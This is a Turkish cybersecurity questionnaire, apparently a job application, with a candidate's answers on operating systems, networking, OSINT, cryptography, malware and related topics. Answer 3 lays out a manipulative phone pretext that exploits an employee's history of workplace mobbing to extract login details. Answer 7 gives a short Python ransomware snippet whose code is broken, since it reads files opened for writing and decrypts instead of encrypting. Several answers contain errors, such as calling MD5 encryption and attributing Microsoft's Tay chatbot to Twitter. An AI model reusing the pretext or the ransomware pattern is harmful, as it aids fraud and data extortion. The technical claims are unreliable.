Cevaplar

Soru 1:

İşletim sistemlerine ne kadar hakimsin? Windows Linux farkını biliyor musun? İşletim sistemi katmanlarını biliyor musun? İşletim sistemi çalışma mantığını biliyor musun? (Prosesler Threadler vb.) İşletim sistemine kod yazarak müdahale edebilir misin?

Cevap 1:

Bayağı uzun süredir linux işletim sistemleri kullanıyorum. Windows ile linux işletim sistemlerinin arasında bulunan farklara yeterince hakim olduğumu düşünüyorum. İşletim sistemleri kısaca disk tanımlamasından sonra boot sayesinde verilerin yüklenmesiyle çalışan bilgisayarla iletişim kurmamızı sağlayan önceden programlanmış yazılımlardır. İşletim sistemine kod yazarak müdahale etmekten kasıt yetki yükseltmek, veya bufferoverflow tarzı işlemlerse daha öncesinde bu işlemleri yaptım. Arkada çalışan işlemlerden linux bünyesinde haberdar olmakla birlikte windows bünyesinde çok bildiğim şeyler değiller ne yazık ki.

Soru 2:

Linux terminaline ne kadar hakimsin? Linux temel komutlarını biliyor musun? Sadece terminal ekranını kullanarak bir bilgisayarı yönetebilir misin? Bash scripting biliyor musun? Ne seviyede biliyorsun? Linux terminalinde protokol yönetimi cihaz yönetimi vb. gibi konuları yapabiliyor musun?

Cevap 2:

Terminal en sevdiğim şey olabilir. Hatta aptal arayüzlerle karşılaşmasak ve bilgisayarlar sadece siyah ekranlardan ibaret olsa daha mutlu olabilirim gibi geliyor. Daha öncesinde create toollar ile kendi linux distromu tasarlamışlığım dahi var. Şu anda havelsanın bir ürünü için eğitim amaçlı bir OS tasarlıyorum. Bash yani yalan söylemeyelim çok bildiğim bir şey değil fakat iyi derecede python bildiğimden dolayı anlamakta zorluk çekmiyorum. Websocket konusunda daha önce de çalıştım hala daha kendimi geliştirmeye devam ediyorum.

Soru 3:

Sosyal mühendisliği tam anlamıyla biliyor musun? (Nedir nasıl yapılır neden kullanılır (iyi veya kötü)) Sosyal mühendislik türlerini biliyor musun? Sosyal mühendislik türlerinde senaryolar yazabilir misin? KVKK'ya takılmadan tamamen uygun, etkin bir şekilde bir senaryo hazırlaman ne kadar sürecektir. Tüm türlerin içerisinde barınan tamamen kötü veya tamamen iyi uzun senaryolar hazırlayabilir misin?

Cevap 3:

Sosyal mühendislik tamamıyla saldırı amacından çok saldırının aşamalarından biridir. Ben en değerli makinelerin insan olduğunu düşünenlerdenim onları hackleyebilirsek geriye kalanlar önemsizdir kafası. Olayın KKVK kısmı hakkında herhangi bir bilgim yok. Ama türlerine örnek verirsek. Oltalama (phishing), Truva atları, Rol yapma gibi türleri var diye hatırlıyorum. Daha önce herhangi bir hedefe sızmak için bir sosyal mühendislik girişiminde bulunmadım sadece insanların nasıl düşünen varlıklar olduğunu kendimce bilen biriyim. Çok basit bir senaryo örneği vermem gerekirse: Saldırgan sızmak istediği şirkete dair araştırma yaptığında bir çalışanın şirket içinde daha öncesinde dışlandığı mobbinge uğradığına dair bir bilgi elde eder ve bu kişinin telefon numarasının linkedlinde açık olduğunu görür. Sonrasında saldırgan kurbanı telefonla arar: -Merhaba ben işe yeni başladım ismim Batuhan numaranızı yöneticimden aldım. Şu anda çok sıkışık bir durumdayım lütfen bana yardım edebilir misiniz? -Kim olduğunuzu söyleyebilir misiniz? İsminiz nedir? -(biraz kekeleyerek konuşmak iyidir.) Ben ben Batuhan Batuhan Aydın. Burada sanki iş yokuşa sürülüyormuş gibi olsa da kurban hakkında bildiğimiz inanılmaz bir bilgi var daha öncesinde mobbinge uğramış olması. -Buyrun size nasıl yardımcı olabilirim? -Şey ben çok sıkıntıdayım insanlar bir aptal olduğumu düşünüyorlar. Bugün sistem üzerine yüklemem gereken dosyalardan birini yükleyemedim 10 dk sonra toplantım var ve dosyaların sisteme yüklenmesi gerekmekte. -Eeee yükleyebilirsin Batuhan sisteme (adres ismi info 1) giriş yap sonrasında kullanıcı adını yaz, şifreni unuttuysan unuttum butonuna tıkla. Zaten şifreni öyle sıfırlayabilirsin. -Fakat sorun da orada işte ben bu sisteme daha önce bir kez giriş yaptım ve kullanıcı adı kısmına ne yazıldığını hatırlamıyorum. -(Burası tamamen varsayımsal bilgidir fakat insanlar bu bilgiyi çoğu zaman verirler) TC kimlik numaranı yaz. Default olarak o kayıtlı oluyor. Bu kısımda durmamız gerekmekte saldırgan giriş yapılan path'i biliyor. Kullanıcı adına ne yazması gerektiğini de biliyor. Burada lafı uzatarak kendini acındırarak şifrelerini neden unuttuğunu nasıl şifre oluşturursa unutmayacağını sorarak kurbanın şifre oluşturma yöntemiyle ilgili bilgi sahibi olabiliriz.

Soru 4

Network katmanlarıne ne kadar hakimsin? Network iletişimini detaylı şekilde açıklayabilir misin? Adreslemeler konusunda ne kadar bilgin var? Bir networku tamamen mantıksal olarak kurabilir misin? Network iletişim türlerini ne kadar biliyorsun? Network paketlerine hakim misin? Ağ içi ve ağ dışı saldırılarını biliyor musun? Network üzerinde gerçekleşen aktif ve pasif saldırıları biliyor musun? Bu saldırıları uygulayabilir misin? Saldırıları savunabilir misin?

Cevap 4

Network konusuna gelirsek internetin nasıl çalıştığını verilebilecek herhangi bir hikaye zemininde bile anlatabilirim. Çok uzun süredir sanallaştırma kullandığımdan dolayı adreslemeler hakkında bayağı bilgi sahibi oldum. Network iletişimini ise birkaç satır kodla açılayayım.

import  requests
url  =  "http"
anyone_api  =  "http://yollaapiye/api/api_post.php"
api_key  =  "HERHANGIBIRKEY"
gonderilecek_sey=  'print("Hello World!)'
data  = {
'api_dev_key': anyone_api,
'api_option' : 'paste',
'api_paste' : gonderilecek_sey,
'api_format': 'python3.9'
}
requestss  =  requests.post(url=anyone_api, data=data)
url_print  =  requestss.text
url_status_code  =  requestss.status_code
print(url_print)
print(url_status_code)

Burada gönderilen bir post.py dosyası bir api üzerine source içinde olan kodu yollar.

import requests
url  =  "http://maps.googleapis.com/maps/api/geocode/json"
location  =  "TRT Genel Müdürlüğü"
parametre  = {'address': location}
r  =  requests.get(url=url, params=parametre)
data  =  r.json()
print(data) # Burada json parser ile uğraşmadım.

İnternet basitçe böyle çalışır. Biri belli parametrelerle bir şey yollar bana bunu verebilirsen mutlu ve bahtiyar olurum der. Diğeri ise evet efendim diyerek istenen şey eğer doğru bir şekilde istendiyse bu soruya cevap verir. Cevap verirken http veya https kullanır bunun ayrıntısına daha fazla girmeyi şu anda istemiyorum.

Ağ içi saldırılara basit bir örnek airmon-ng üzerinden yapılabilen kullanıcıları ağdan atma sonrasında aynı isim ve şifreli fakat dinlenen bir hotspot noktasına çekme saldırısıdır.

Ağ dışı saldırılara ise DDoS, DoS, ReDos, ortadaki adam saldırılarını örnek verebiliriz.
Aktif ve pasif birinde fiilen bir saldırı ve bulunma söz konusuyken pasifte gözlemleme ve atak yüzeylerinin oluşturulması söz konusudur.

Daha önce sistemlere tryhackme veya vulnhub gibi kuruluşlar üzerinden saldırdım. Fakat savunma konusunda bazı şeyler bilsem bile yetersiz olduğumu düşünüyorum.

Soru 5

Açık kaynak istihbaratı yöntemlerini biliyor musun? Pasif ve aktif bilgi toplamaya hakim misin? Açık kaynak istihbaratında elde edilen bilgilerin yasallığı ve kullanımına hakim misin? İstihbarat ile kişisel bilgilere erişebilir misin? İstihbarat ile devlet verilerine erişebilir misin?

Cevap 5

Evet OSINT konusunda fena değilimdir. Pek çok bilgi toplama toolu bilmemle birlikte en sevdiğim googledır. İstihbarak ile kişisel bilgilere erişim sağlayabilirim aslında internet üzerindeki her bilgiye yeterli zaman verildiğinde erişim sağlayabilirim. İstihbarattan ziyade daha öncesinde devlet verilerine erişmişliğim bulunmakta, tabi ki bir etik hacker ekolünden geldiğimden ve devletimi her şeyden üstün tuttuğumdan dolayı gidip bulduğum açıkları bir bir bildiren biriyim. Devlet verileri çoğu zaman internet üzerinde doğrudan yayınlanmaz. Her bilgi gibi değerli bilgiler sistemler arkasında saklanır bu yüzden içeriden internet üzerinden diğerlerine kıyasla bilgi sağlamak normal şartlarda çok ama çok zordur.

Soru 6

Şifreleme neden kullanılır? Şifreleme yöntemleri nelerdir? Hangi şifreleme, hangi alanda kullanılır? Anahtarlama yöntemleri nelerdir? Baştan sonra HTTPS şifreli iletişimi tanımlayabilir misin? Kendi kriptoloji algoritmanı encoder/decoder olarak yazabilir misin? Online bir uygulamada iletişimi kendi tasarladığın kriptoloji algoritmasıyla gerçekleştirebilir misin?

Cevap 6

Şifreleme basit olarak birine "Hello World!" göndermek istiyoruz fakat bu gönderilen metnin sadece karşıdaki kullanıcı tarafından okunmasını istiyoruz mantığıyla yapılmış romadan beri kullanılan bir yöntemdir. Değerli bilgilerin okumaması gereken birinin eline geçmemesini sağlar. Mesela "Hello World!" olarak göndermektense "b10a8db164e0754105b7a99be72e3fe5" MD5 ile şifreleyip bu şeklide gönderdiğimde bu şifrenin çözülmesi gerekir. Hello World yazan bir metnin şifresini çözmek kolay olsa dahi 54628ca648b575cac1da957e2a89a3b8 bunun gibi bir şifreyi çözmek imkansızdır. Sebebi MD5'in geri döndürülemez bir şekilde şifrelenmesidir. Çözmek için metnin oluşabilecek bütün kombinasyonlarının denenmesi gerekir. Hatta şifrenin içine belli bir algoritmayla sürekli olarak farklı bir salt eklenenerek b10a8db164e0754105b7a99be72e3fe5 şifrenin çözülmesi imkansızlaştırılır. Şifreleme türleri Simetrik, DES, AES etc. olarak sıralanabilir. Encode derinleştikçe encode ile doğru orantılı olarak decode maliyeti de artar. HTTP ile gönderilen bir paket SSL aracılığıyla iletildiğinde bunun ismi HTTPS olur. Daha önce kendi kriptoloji algoritmamı yazmadım fakat encode/decode edilebilecek bir algoritma yazabileceğimi ve yazarken zorlanmayacağımı düşünüyorum. Kendi tasarladığım bir algoritmayla iletişimi gerçekleştirebilirim fakat işin doğasında standartlar yattığından dolayı buna internetin izin vereceğini hiç sanmıyorum. Sadece tang serverlarına benzer bir server oluşturularak giriş ve çıkışların .jwe uzantılı bir dosya kalıbına ihtiyaç duyması sağlanabilir.

Soru 7

Malware türleri nelerdir? Hangi tür ne amaçla çıkarılmıştır? Hangi tür malwaredan nasıl korunulur? Çalışma mantıkları nelerdir? Malware analizi nedir nasıl yapılır? Malware logları nasıl incelenir? Trafikte bıraktıkları işaretler ve bilgisayarda yaptıkları değişiklikler nelerdir? Kodlanışları nasıldır?

Cevap 7

Pek çok malware türü olmakla beraber Ransomware, Trojan, Toolkit, Rootkit gibi örneklerini çoğaltabileceğimiz zararlı yazılım türleri vardır. Hackerlığın temelinde anarşizm yatar, Hackerlar bozuk olan veya bozuk olduğunu düşündükleri sistemlere saldırarak o sistemlere zarar vermeyi veya sistemleri yok etmeyi amaçlamaktadırlar. Fakat günümüze geldiğimizde bu zararlı yazılımlar anarşizmden çok para sızdırma, bilgi alma ve devletsel bazlarda yapılırlar. Çalışma mantıkları türden türe göre farklılık göstermekle beraber hepsi erişim sağlamaya, kullanıcı bilgileri toplamaya odaklıdır. Türler isimleri üzerinde olduğundan dolayı uzun uzun açıklanmaya ihtiyaç olmadığını düşünmekteyim. Daha önce hiçbir malware logu incelemediğimi itiraf etmeliyim fakat 5 dk'da bir malware kodlayalım.

import  os

from  cryptography.fernet  import  Fernet

dosyalar  = []

for  dosya  in  dosyalar:

if  dosya  ==  "ransom.py"  or  dosya  ==  "key.txy":

continue

if  os.path.isfile(dosya):

dosyalar.append(dosya)

key  =  Fernet.generate_key()

with(open('key.txt', 'wb') as  thekey):

key  =  thekey.write(key)

for  dosya  in  dosyalar:

with  open(dosya, 'wb') as  thefile:

contents  =  thefile.read()

contents_dec  =  Fernet(key=key).decrypt(contents)

with  open(dosya, 'wb') as  thefile:

thefile.write(contents_dec)

Yazdığım minik ransomware bulunduğu path üzerindeki tüm dosyaları oluşturulan key ile şifreler ve içeriğinin üzerine yazar. Her şey sonuçta bir dosyadır. Normal bir ransomware bilgisayar içinde bulunan bütün dosyaları özel bir dosya formatına çevirerek şifreler. Bilgisayar üzerinde bulunan geri dönüş noktalarını siler. Bütün şifreleri ve geçmiş dökümanları ele geçirir. Hatta bazıları bilgisayar üzerine cpu ve gpu yükü bindirerek programların çalışmalarını yavaşlatmaya çalışır. Son olarak masaüstüne beni oku çok önemli.txt gibi bir dosya bırakır bilmem ne kadarlık BTC ister cüzdanını da aşağıya bırakır. Eğer özel bir saldırı değilse birkaç hafta içinde anti-malware firmaları bilgisayara yüklenmiş olan randsomware'ı çözecek olan programı yayınlar sizde indirip kurup virüsten arınmış olursunuz.

Soru 8

IoT cihazlar nelerdir? IoT cihazlar nasıl çalışmaktadır? IoT cihazların önemi nedir? IoT cihazlar hangi protokolleri kullanabilir? IoT cihaz açıkları nelerdir? IoT pentesting nasıl yapılır? IoT cihazlarıı saldırı, savunma veya test amaçlı tasarlayarak kullanabilir misin?

Cevap 8

Namıdeğer nesnelerin interneti etrafımızda gördüğümüz network üzerine bağlı herhangi bir işlevi olan nesnedir. Hatta ben sürekli olarak sosyal medyada takılıp herhangi bir amacı olamadan duran insanları bu nesnelerin internetine dahil olarak düşünürüm :). Wifi, bluetooth gibi daha yaygın olarak dış dünyayla iletişim kurarlar ve kendilerine gönderilen programlanmış emirleri doğrultusunda hareket ederler. Protokol bazında yaygın olarak evimizde kullandıklarımız wifi veya bluetooth gibi protokoller olmakla birlikte hatılardığım kadarıyla mtqq veya mqtt gibi zenbee (zigbee veya zinbee'de olabilir) protokol türleri vardır. Protokol farklılıklarının temel sebebi maliyeti düşürerek daha yüksel satış yapmaktır. IoT cihazlarında bulunan en genel açık yazılımlarının sürekli olarak güncellenmiyor olmasıdır. Daha önce IoT pentest yapmadım fakat bir IoT cihazını saldırı veya savunma amaçlı kullanılabilmesi bir ağ bağlantısına dahil olduğundan dolayı mümkündür. Ben daha önce tasarlamadım fakat internet üzerinden bir donanım geliştirebilecek programlama becerisine sahipim.

Soru 9

Genel uygulama güvenliği nedir? Güvenli olmayan uygulama nasıl anlaşılır? Güvensiz uygulama türleri nelerdir? Güvenli uygulama nasıl tasarlanır? Uygulama açıkları nelerdir? Uygulama açıkları nasıl keşfedilir ve kullanılabilir?

Cevap 9

Bunu her açıdan aşağı yukarı aynı yere çıktığından dolayı web üzerinden anlatmak istiyorum. Bir uygulama bir çerçeve bazında tasarlanmışsa dış alanlar üzerinden yüksek bir müdahale yapılmamışsa o uygulama büyük oranda güvendedir diyebilmemiz mümkündür. Güvenli olmayan uygulamalara bazen bir bakış atmak sekmeler arasında gezmek yeterlidir. Kötü geliştirilmiş bir yazılım kendini 300 metreden çoğu durumda belli eder. Güvensiz uygulamalar kaynağı belirsiz olup herhangi bir sertifikasyonu bulunmayan uygulamalardır. Uygulama açıkları artık hepimizin yavaş yavaş aşina olduğu OWASP 10 üzerinden bakılabilir. Uygulama açığı erişim noktasına, bulunduğu yere çok uzatmazsak taşına toprağına göre değişebilir. Uygulama açığının keşfedilmesi sonrasında ise bunun kullanılması konusu bulunan açık türüne ve arkada kullanılan infrastructure'a göre değiştiğinden dolayı her açık türünü tek tek açık anlatmayacağım.

Soru 10

Tersine mühendislik nedir? Tersine mühendislik yöntemleri nelerdir? Tersine mühendislik neden yapılır? Tersine mühendislik yapmak için hangi bilgilere ihtiyacımız vardır? Tersine mühendislik yaparak bir programı kullanılabilir veya kullanılamaz hale getirebilir misin? Tersine mühendislik yöntemleriyle donanım çözebilir misin?

Cevap 10

Donanımsal veya yazılımsal bir ürünün yapıbozuma uğratılarak parçalarına ayrılma sürecine verilen isimdir. Yöntemden kastın ne olduğunu tam olarak anlayamadım. Tersine mühendisliğin yapılmasındaki temel amaç ürünü parçalara bölerek yeniden kullanımının sağlanmasını sağlamaktır. Daha önce tersine mühendislik yöntemiyle mobile uygulamaları açtım. Program tersine mühendislik sürecine girikten sonra kullanılamaz hale dönüşmekle birlikte istenilen değişiklikler yapılıp tekrardan toplanarak tekrardan kullanılabilir hale getirilebilir. Donanımsal bir aracı çözmek inanılmaz zor geliyor bana daha önce hiç denemedim becerip beceremeyeceğimden tam olarak emin değilim.

Soru 11

Gizlenme yöntemleri nelerdir? Gizlenmenin önemi veya gerekliliği nedir? Fiziksel gizlenebilir misin? Herhangi bir network içerisinde gizlenebilir misin? İnternet üzerinde gizlenme yöntemleri nelerdir? İnternet üzerinde ne kadar gizlenebilirsin? Gizliliği sağlayan ve açığa çıkaran şeyler nelerdir?

Cevap 11:

İlk akla gelenleri söylemek gerekirse VPN tor gibi yöntemler belirtilebilir. Bence çok gerekli değil insanın özel hayatına saygı duyacak kadar bilgi toplanması çokta zararlı değil sonuçta biz bir sisteme giriyorsak izin alarak giriyoruz. Belki doğduğum dönem belki de başka sebeplerden dolayı gizlenmeye çokta ihtiyaç duymadım. Fiziksel olarak iyi saklanbaç oynarım. Bir network ağında gizlenmem gerekiyorsa ve iç ağa giriş sağladıysam kendi ip adresimi sürekli olarak log kayıtlarından silecek bir bash script tasarlayabileceğimi düşünüyorum. İnternet üzerinde gizlenmek için kurabiyelerimizi arkamızda bırakmamız, vpn üzerinden internete çıkmamız veya tor bağlantısı üzerinden giriş yapmamız gerekli. Web3 hayatımıza girip yaygınlaştmasını oturtabilirse merkeziyetsiz internet sonucunda daha gizli hale gelebiliriz belki. Bizi açığa çıkaran ana şey dışbacak ip adresimiz ve mac adresimizdir. Mac kalıcı olarak olmasa da geçici olarak değiştirilebilse dahi dışbacak ip adresi her daim baki kaldığından gizlenmemiz evde takılırken mümkün değil.

Soru 12

Mobil cihazlar nasıl tasarlanır? Mobil cihazların, masaüstü cihazlardan veya IoT cihazlardan farkları nelerdir? Mobil programlamada en temel açıklar nelerdir? Mobil cihazlara ne tür saldırılar uygulanabilir? Mobil cihazlar nasıl daha güvenli hale getirilebilir? Mobil işletim sistemleri ve çalışma mantıkları nelerdir? Mobil'in güvenlik açısından avantajları ve dezavantajları nelerdir? Bir mobil cihaz nasıl saldırı veya savunma için kullanılabilir?

Cevap 12

Mobil cihazlar mini bilgisayarlardır. İçinde yine android ios gibi işletim sistemleri yüklü olan donanımsal aygıtlara verdiğimiz isimdir. Mobil cihazlar baz istasyonlarından aldıkları anlık bilgilerle sürekli olarak tespit edilirler, baz istasyonları üzerinden internete çıkar yine baz istasyonları üzerinden mobil hat erişimlerini devam ettirirler. Benim rastladığım en temel açık kaynak kodun şifrelenmemiş olması oluyor baktığım 10 uygulamadan en az 5inde bu var. Şifrelenen metinler düzgün şifrelenmiyor bu yüzden biraz kağıt kalem biraz da deneme yanılma yoluyla düzgün şifrelenmemiş alanlar hacklenebilmeye açıklar. Mobil cihazlar üzerinde yapılan en yaygın saldırı oltalama yöntemidir. Mobil uygulamalar çalınabilme veya bilinçsiz kullanıcının wifi ağı üzerinden dinlenebilir. Mobil cihazların adı üstünde mobiliteleri olduğundan dolayı şirket içi ağa saldırmak, fotoğraf çekmek ortam dinlemesi dahi yapmak için kullanılabilir.

Soru 13

CTF nedir? CTF neden vardır? CTF yarışmalarının konuları nelerdir? Bu konularda genel olarak Kolay/Orta/Zor/İmkansız gibi seviyelerden hangilerini çözebilirsin? Hangi CTF konularına hakimsin? Hangi CTF konularına hakim değilsin?

Cevap 13

"Capture the flag" bayrağı yakala şeklide türkçeleştirebileceğimiz CTFler sorunun içine gizlenmiş olan bayrağa ulaşmak üzere tasarlanmış bir yarışma çeşididir. CTFlerin varlık sebepleri eğlence, sidik yarışı, ödül, prestij, para gibi pek çok şekilde nedenlendirilebilir. CTF yarışmaları web, kriptografi, osint, network gibi her bir ayrı bir uzmanlık gerektiren konulardan oluşur. Kolay orta bazen ise zor problemlerin çözümlerini bulabilirim. Burada dikkat çekilmesi gereken nokta baz alınan noktanın ne olduğudur kime göre zorluk seviyesi ortaya atıldığında bazı Ctf yarışmalarında tek bir soruyu bile çözülemeyebilir. Web, network ve kriptografi konularında kendime biraz güvenirim. Reverse Engineering, Binary exp gibi konularda ise daha çok şey öğrenmem gerektiğini düşünmekteyim.

Soru 14

Web programlama yapabilir misin? Web sitesi ara yüzü tasarlayabilir misin? İçerisinde üyelik ve karışık bilgiler barındıran bir web sitesi tasarlayabilir misin? Tamamen bir web sitesi tasarlayabilir misin (seviyeli üyelikler, sessionlar, tokenlar, admin paneli, temalar, çerezler vb.) ? Web güvenlik açıkları nelerdir? OWASP ve OWASP Top 10 biliyor musun? OWASP Top 10 ne kadar hakimsin? Sunucu çalışma mantığını biliyor musun? Web protokollerine ve zafiyetlerine hakim misin? Bir web sunucusuna sızabilir misin? Bir web sunucusunu koruyabilir misin?

Cevap 15

Daha öncesinde freelance olarak web programlama yaptım, backend tasarladım frontend konusunda berbatım. İçinde üyelik ve çok karmaşık olmadığı sürece herhangi bir websitesini tasarlayabilirim. Daha önce büyük çapta bir projeye hiç girişmediğimden bunu yapabilir miyim bilmiyorum. Web güvenlik açıkları XSS, SQLi, IDOR, CSRF gibi sayısını çoğaltabileceğim onlarca güvenlik açık türü mevcuttur. OWASP ve OWASP 10 hakkında kendimi sürekli yenilemek ve sürekli okumakla birlikte tam olarak bildiğimi söylemem imkansız. Serverlar birden fazla makinenin bağlanabildiği yüksek cpu ram ve gpulu bilgisayarlara verilen isimdir. Herhangi bir protokol üzerinden internete açıksa server bağlanılır ve kontrolü sağlanır. Sızma konusunda gerçek olamayan makinelere sızmışlığım vardır. Bir web sunucusunun korunması alanında çalışmadım fakat saldırmayı bildiğimden dolayı korumayı da kolayca öğrenebilirim.

Soru 16

Yapay zeka nedir? Yapay zeka algoritmalarını biliyor musun? Yapay zeka kodlayabilir misin? Yapay zekanın karşılaştığı en büyük problemler nelerdir? Yapay zeka içerisinde bulunan zayfılıklar nelerdir? Yapay zekayı saldırı veya savunma amaçlı nasıl kullanabilirsin? Mevcut bir yapay zekayı manipüle ederek, kendi çıkarların doğrultusunda, işlevini değiştirerek kullanabilir misin?

Cevap 16

Yapay zeka belli bir algoritmik zemin üzerinde kendisine gelen bilgileri işleyerek otomatik kararlar alınmasını veriler aracılığıyla yeni bilgiler oluşturulmasını sağlayan bilişim dalıdır. Daha önce geliştirdiğim ufak tefek gözetimli işlevsiz yapay zeka algoritmaları var. Yapay zekanın bence karşılaştığı en büyük problem insan ve işlemci gücü, bunlar aşıldığında olduğundan çok daha ileriye gideceğinden eminim. Saldrı amaçlı olarak hangi bilginin değerli olduğu öğretilen bir yapay zeka sistemleri tarayarak güvenlik zafiyetlerini tespit edebilir. Savunma amaçlı olarakta logları değerlendirerek saldırıyı daha başlamadan çok hızlı bir şekilde engelleyebilir. Yapay zekadan yapay zekaya değişecek bir durum bu Buna verilebilecek en güzel örnek Twitter'ın https://www.theverge.com/2016/3/24/11297050/tay-microsoft-chatbot-racist bu yazıda anlatılan chat botudur.

Soru 17

Veri analizi nedir? Veri analizi neden yapılır? Veri analiz yöntemleri nelerdir? Büyük veri nedir? Elde edilen veriler saldırı veya savunma amaçlı nasıl kullanılabilir? Mevcut verilerin saldırı veya savunma amaçlı kullanılmasıyla hangi sonuçlar elde edilebilir? Saldırı veya savunma amaçlı veri nasıl toplanabilir? Nitelikli veri olmadan saldırı veya savunma nasıl yapılabilir?

Cevap 17

Veri analizi daha önce merak ettiğimden dolayı birkaç kere deneyip zevk almayop bıraktığım bir alan. Öğrenilmeye öğrenilir fakat zaman istiyor bayağı bir zaman hemde. İhtiyaç halinde öğrenip kullanırım.

Soru 18

Penetrasyon testi nedir? Penetrasyon testi neden yapılır? Penetrasyon testi nasıl yapılır? Penetrasyon tesi türleri nelerdir? Testler sırasında hangi materyaller ve toollar kullanılır? Test sırasında elde edilen veriler tekrar nasıl işlenir veya nasıl sonuca bağlanır? Penetrasyon testi veya penetrasyon dışarıdan nasıl anlaşılır?

Cevap 18

Sızma testi bir sistem üzerine black veya white olarak saldırarak elde edilen raporun sunulup firmaya güvenlik açıklarının bildirildiği olaydır. Test sırasında https://gist.github.com/Batuhanaydn/471080a7ea0bea67026544446db11750 buradan yüklenebilecek kali toolları kullanılır.

Soru 19

Veri tabanı nedir? Veri tabanı neden kullanılır? Uygun veri tabanı nasıl seçilir? Veri tabanı nasıl tasarlanır? Veri tabanı komutları nelerdir? Veri tabanı güvenlik açıkları nelerdir? Veri tabanı içeriden veya dışarıdan saldırılara karşı nasıl daha güvenli hale getirilir?

Cevap 19

Sorunun cevabı kısaca veritabanı sistemlerinin hayati olduğudur. Daha önce küçük çaplı veritabanları hazıladım fakat uzmanlık alanım değil bu yüzden çok şey bilmiyorum bu konu hakkında

Soru 20

Son kullanıcı ve uç nokta güvenliği neleri kapsar? Son kullanıcı güvenliği konularından hangilerine hakimsin? Son kullanıcının en çok karşılaştığı saldırı türleri veya hatalı davranışları nelerdir? Son kullanıcıyı nasıl bilinçlendirebiliriz veya son kullanıcıyı nasıl koruyabiliriz?

Cevap 20

Telefonlar, bilgisayarlar, tabletler gibi internete bağlı cihazların tamamı endpointtir. Son kullanıcıyı düşük yetkilendirerek yapılan aksiyomlar loglandığı sürece iyi dizayn edilmiş bir yerden hiçbir şey çıkmaz. Son kullanıcının benim gözümdeki en büyük hatası insanlara fazla güvenmesi işini yapmak istemeyen arkadaşlarla karşılaştırmamız biraz rahatsız edici olsa da gerekli bir durum. Son kullanıcının en büyük ihmali public ağlara bağlanmak, Bir bakmışsın ki 50 yıllık borcun var bu yüzden iller çapında eğitimler verilmelidir.

Soru 21

Yönetim ve yönetici nedir? İyi bir yönetici hangi nitelikleri taşımaktadır? Danışmanlık nedir? Yönetici neden danışmana ihtiyaç duyar? Sistem yöneticisi nedir? Sistemin neden yönetilmeye ihtiyacı vardır? Topluluklar neden yönetilir? Yöneticilerin en çok karşılaştığı problemler nelerdir? Yöneticilerin problemlere karşı çözümleri nelerdir?

Cevap 21

Bu konu kişiden kişiye değişebileceğinden dolayı yaşayarak cevap vermek çok daha mantıklı

Soru 22

Sanallaştırma nedir? Sanallaştırmanın önemi nedir ve neden yapılır? Sanallaştırmada nelere dikkat edilir? Sanallaştırmada en çok karşılaşılan problemler ve çözümleri nelerdir? Sanallaştırma nasıl yapılır? Hangi donanımları sanallaştırabilirsin? Sanallaştırma nasıl güvenlik açıkları veya dezavantajlar doğurabilir? Sanallaştırmanın avantajları nelerdir?

Cevap 22

Sanallaştırma bir makineyi gerçekte kurmadan bilgisayar üzerinde başlatmaya verilen isimdir. Doğru bir şekilde yapılandırılıp userlar doğru yapılandırıldığında herhangi bir sorun kalmaz. Avantajları hızlıca çalıştırılabilir

Soru 22

Cloud nedir? Cloud nasıl ve neden kullanılır? Cloud nasıl yönetilir? Cloud yönetiminde nelere dikkat edilir? Cloud güvenlik açıkları nelerdir? Cloud nasıl daha güvenli hale getirilir?

Cevap 22

Bkz Aws Azure digital ocean gibi şirketlerin docker vazen ise direkt makine üzerine kurulamasını sağlayan şeydir.

Soru 23

Network cihazları nelerdir? Hangi cihazın kaçıncı katmanda çalıştığını biliyor musun? Network cihazlarının görevlerini biliyor musun? Network tasarım topolojilerine hakim misin? Network cihaz konfigürasyonlarını biliyor musun? Bir networku fiziksel olarak tasarlayabilir misin? Network cihaz güvenlik açıklarını biliyor musun? Network cihazlarını nasıl daha güvenli hale getirebilirsin?

Cevap 23

Daha önceki sorularda bunlara bolca değindim.

Soru 24

Python dilini biliyor musun? Python nerelerde kullanıldığını biliyor musun? Python'un hangi konularına veya alanlarına hakimsin? Python ile neler yapabilirsin,?

Cevap 24

Python dilini çok iyi biliyorum. Pek çok yerde kullanıyorum. Pythonla internet bağlantım olduğu ve yeterince süremin olduğunu varsayarsak herhangi bir şeyi yaparım.

Soru 25

Hangi yabancı dillere ne seviyede hakimsin? Reading, listening ve speaking seviyelerin neler?

Cevap 25

İngilizce b1 b2 seviyesinde rahatça okuma yapabiliyorum, dinlediğimi aksan ağır değilse anlıyorum. Speaking bulunmamakta aranıyor hala